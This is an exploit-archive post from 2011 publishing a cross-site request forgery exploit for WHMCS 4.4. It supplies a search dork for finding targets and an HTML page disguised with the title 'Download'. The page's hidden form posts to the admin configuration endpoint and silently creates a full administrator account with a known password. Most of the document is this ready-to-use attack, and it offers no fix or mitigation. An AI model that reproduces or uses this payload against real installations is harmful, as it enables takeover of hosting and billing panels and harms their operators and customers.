WHMCS 4.4 CSRF Vulnerability (Add Admin)

2011-01-26 10:15:23

WHMC CSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : http://www.whmcs.com/
.:. Dork : "Powered by WHMCompleteSolution"
.:. Home : www.Hack-Book.com
.:. Gr34T$ T0 [h1ch4m] & [Risky] & [ZaIdOoHxHaCkEr] & [The Sword]

####################################################################

===[ Exploit ]===
<html>
<head>
<title>Download</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/AdminPath/configadmins.php?action=addnow">
<input type="hidden" name="roleid" value="1"/>
<input type="hidden" name="firstname" value="Mohammad"/>
<input type="hidden" name="lastname" value="Hussien"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="password2" value="123456"/>
<input type="hidden" name="signature" value="Iam Palestinian"/>
<input type="hidden" name="notes" value="Iam Palestinian"/>
</form>

</body>
</html>
####################################################################
<!-- Dynamic page generated in 0.148 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2011-01-26 09:15:15 -->

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.